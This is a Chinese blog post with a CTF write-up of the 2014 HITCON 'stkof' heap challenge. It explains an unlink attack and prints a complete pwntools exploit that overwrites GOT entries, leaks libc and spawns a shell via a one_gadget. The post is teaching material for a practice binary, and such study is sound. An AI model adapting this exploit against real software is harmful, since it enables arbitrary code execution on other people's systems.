2014_hitcon_stkof

于 2022-02-10 19:15:15 发布
阅读量1.3k 收藏
点赞数
分类专栏: PWN 文章标签: pwn 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_57754423/article/details/122867278
版权

题目是wiki上的一道题目,对应的知识点是unlink,也是因为一些事情很久没有学pwn了,下面简单分析一下这道题目。

漏洞是在编辑chunk的功能里存在的:

可以任意大小的向chunk里输入内容。

我们已知存储chunk数组的地址,同时可以修改next_chunk的 pre_size位和size位,可以采用unlink。

unlink的核心思想就是,通过相关的检查,将一个chunk从一个chun的链表中取出,然后与其地址相邻的free状态的chunk进行合并。

本题的利用思路就是:

通过编辑一个chunk覆盖其下一个chunk的pre_size位和size位,然后在当前chunk的数据域构造一个fake_chunk,通过unlink的检查机制,然后执行unlink,随后修改bss段中chunk数组中所存的数据,从而达到任意地址写的目的。

exp:

from pwn import *
p = process("./stkof")
elf = ELF("./stkof")
libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
context.log_level = "debug"
p.timeout = 0.5
def add(size):
	p.sendline("1")
	p.sendline(str(size))
	p.recvuntil("OK\n")

def edit(index,size,desc):
	p.sendline("2")
	p.sendline(str(index))
	p.sendline(str(size))
	p.sendline(desc)
	p.recvuntil("OK\n")

def free(index):
	p.sendline("3")
	p.sendline(str(index))
	p.recvuntil("0K\n")
add(0X10)
add(0X30)
add(0X80)
add(0x10)
pl1 = p64(0) + p64(0X30) + p64(0x602138) + p64(0x602140) + p64(0X20) + p64(0) + p64(0x30) + p64(0x90) 
edit(2,0x40,pl1)    #make fake_chunk
free(3)#unlink 
pl2 = "a"*(0x8) + p64(elf.got["free"]) + p64(elf.got["puts"]) + p64(elf.got["atoi"])
edit(2,0x20,pl2)
edit(0,0x8,p64(elf.plt["puts"]))
free(1)

puts_addr = u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
log.success("puts_addr:"+hex(puts_addr))
libc_base = puts_addr - libc.sym["puts"]
sys= libc_base + libc.sym["system"]
sh =libc_base +  next(libc.search("/bin/sh"))
gadget = libc_base +  0xf03a4 #0xf1247 one_gadget


log.success("sys_addr:" +hex(sys))
edit(2,0x8,p64(gadget))

p.interactive()

成功拿到shell:

 

cut_maize
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
2014 HITCON stkof 的 exp
哒君的博客
07-23 505
思路借鉴于ctf-wiki,但ctf-wiki之中的思路较简略,且exp有一点疏忽的地方,故在此记录
hitcon2014_stkof
z1r0的博客
12-27 292
hitcon2014_stkof 查看保护 在edit这个功能下可以输入size。没有对size进行判断,这里产生了溢出。 unlink即可。unlink控制堆指针为got表,接着就可以改got为puts,泄露出libc,改got为gadget或system。具体unlink知识看z1r0’s blog from pwn import * context(arch='amd64', os='linux', log_level='debug') file_name = './z1r0' debug =
信息安全_数据安全_HITCON_Badge_2019_秘辛:MCU_ARM_Tru.pdf
08-22
【标题】"信息安全_数据安全_HITCON_Badge_2019_秘辛:MCU_ARM_Tru.pdf" 涉及的是2019年HITCON活动的安全挑战,重点在于利用ARM TrustZone技术在微控制器(MCU)上的应用,特别是与数据安全和信息安全建设相关的内容...
信息安全_数据安全_HITCON_GIRLS_成果分享與_CyberSec_week.pdf
08-22
HITCON GIRLS是一个以女性为主体的信息安全社区,致力于推广信息安全学习和提升科技行业的包容性。 【HITCON GIRLS】 HITCON GIRLS社区通过组织各种主题的读书会,鼓励女性成员深入学习信息安全知识和技术,促进...
HITCON CTF 2017
11-08
HITCON CTF 2017 所有题目整理...............................................................................................................................................................................
HITCON-Training-Writeup:https的简要说明
04-29
HITCON培训 我为做了简短的 有关Linux二进制开发的信息,请参见。 环境设定 git clone https://github.com/scwuaptx/HITCON-Training.git ~/ cd HITCON-Training && chmod u+x ./env_setup.sh && ./env_setup.sh ...
heap_exploit_2.31
03-21
2019 Hitcon一拳超人 tcache藏匿取消链接攻击+ 2019 Hitcon懒人房 tcache藏匿unlink攻击++ 2020 XCTF-GXZY twochunk 由空字节关闭 2019 TCTF最终版Babyheap2.29 2019 Balsn纯文字 大垃圾箱攻击 tcache dup ...
[BUUCTF]PWN——hitcon2014_stkof
mcmuyanga的博客
01-18 802
hitcon2014_stkof 附件 步骤: 例行检查,64位程序,开启了canary和nx 本地试运行一下看看大概的情况, 64位ida载入,给程序的函数改了一下名,方便看,这是道堆,不过没有打印菜单 main(),v3=4的那个函数感觉没什么用,就不截图了 add() del() edit() 利用点在edit() 它向存储在s[v2]的这个数组中的指针开始的地址读入n数个字符(n由我们输入,可以溢出),也就是说,只要我们能够修改s[v2]中存的指针,就可以实现任意地址写。程序没有开启r
unlink小结 && 2014_hitcon_stkof
Pwnpanda的博客
08-02 1355
暑假学习计划 - 0x02 关于unlink的学习资料以及本例题的wp都很多,本篇主要是做个小总结,内附较为详细的调试图片以便初学者理解 (自从入了堆坑学unlink,到现在差不多一个半月了,真的是死去活来,也怪自己的基础差,现在算是理解一些了,先记下来等以后深入理解后再补充,在此感谢各位师傅的帮助,尤其是kaka师傅) 先放基础学习链接: Linux堆溢出漏洞利用之unlink http...
2014 HITCON——stkof
04-20 227
64位程序,没开PIE  #unlink 程序逻辑 1 __int64 __fastcall main(__int64 a1, char **a2, char **a3) 2 { 3 int v3; // eax 4 signed int v5; // [rsp+Ch] [rbp-74h] 5 char nptr; // [rsp+10h] [r...
unlink 2014 HITCON stkof
九层台
08-03 595
这里有一个很坑的问题,ubuntu18和之前的版本堆的管理策略好像不太一样网上说的关于堆的策略的问题可能对ubuntu18有些不太适用。 所以环境就从原本的18改为了16 关于unlink的介绍参考https://ctf-wiki.github.io/ctf-wiki/pwn/heap/unlink/ http://yunnigu.dropsec.xyz/2017/04/05/%E5%A0%...
hitcon2014_stkof(unsorted bin unlink)
seaaseesa的博客
04-09 821
hitcon2014_stkof 首先,检查一下程序的保护机制 然后,我们用IDA分析一下,edit功能存在溢出。 程序没有show功能。 由于没有开启PIE,got表也可以修改,因此,我们利用unlink控制堆指针为got表,然后修改strlen的got表为puts的plt表,即可实现show的功能,进而泄露glibc地址,后续利用。 #coding:utf8 from ...
writeup hitcon-ctf-2014/stkof
fuchuangbob的专栏
06-12 2174
writeup hitcon-ctf-2014/stkof题目: https://github.com/ctfs/write-ups-2014/tree/master/hitcon-ctf-2014/stkof 漏洞分析可参考: http://acez.re/ctf-writeup-hitcon-ctf-2014-stkof-or-modern-heap-overflow/ 使用pwntoo
hitcon_2014_stkof详解
像初雪一样自由洒落
04-20 1682
本文主要列出hitcon2014_stkof的详细过程 主要参考:unlink 系列 程序流程 allocate:分配一个指定size大小的块,返回idx。 其中块的指针信息保存在一个全局变量0x602140中 fill:根据idx找到对应的块,重新给定大小size,读入内容content free:释放idx的块 漏洞分析 由于fill时候的size可以重新制定,可以造成堆溢出。 没有打印函数 有一个全局变量 方法:unlink unlink,控制全局变量内容 修改chunk1指.
unlink buuctf hitcon2014_stkof 个人粗浅理解
carol2358的博客
05-13 679
菜鸡终于对unlink有了些许的了解,写一下自己的理解,用来备份 unlink就是从双向链表中取出元素的行为 感谢网上的多篇前辈的文章,其中这篇让我收获最多 https://bbs.pediy.com/thread-247007.htm unlink 用来将一个双向链表(只存储空闲的 chunk)中的一个元素取出来,可能在以下地方使用 malloc 从恰好大小合适的 large bin 中获取 chunk。 这里需要注意的是 fastbin 与 small bin 就没有使用 unlink,这就是为什么漏
buuctf pwn hitcon2014_stkof 初识unlink
weixin_45677731的博客
08-02 717
最近开始学堆,看了wiki和一些大佬的文章搞懂了这个有关unlink的题目:hitcon2014_stkof 首先拖进ida,看看几个主要的函数: 函数1,创建对,同时可以看到,堆的地址存储在了s处,点进去看看 发现是bss段,像这样的指针,就是这类题目的一个特征 函数2,编辑堆内容,长度可以自己设置,有堆溢出漏洞 函数3,free堆 函数4用处不大 先把三个函数写好: def alloc(size): sh.sendline('1') sh.sendline(str(size))
[hitcon 2017]ssrfme 1
最新发布
04-11
这道题目是一个SSRF漏洞题目。SSRF全称为Server Side Request Forgery,是一种常见的Web安全漏洞。当存在SSRF漏洞时,攻击者可以将服务器作为代理,进而访问在内部网络中无法访问的资源,如内部Web应用、数据库等。此题的目标是通过一个输入参数包含的URL,探测出内部的flag并输出。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值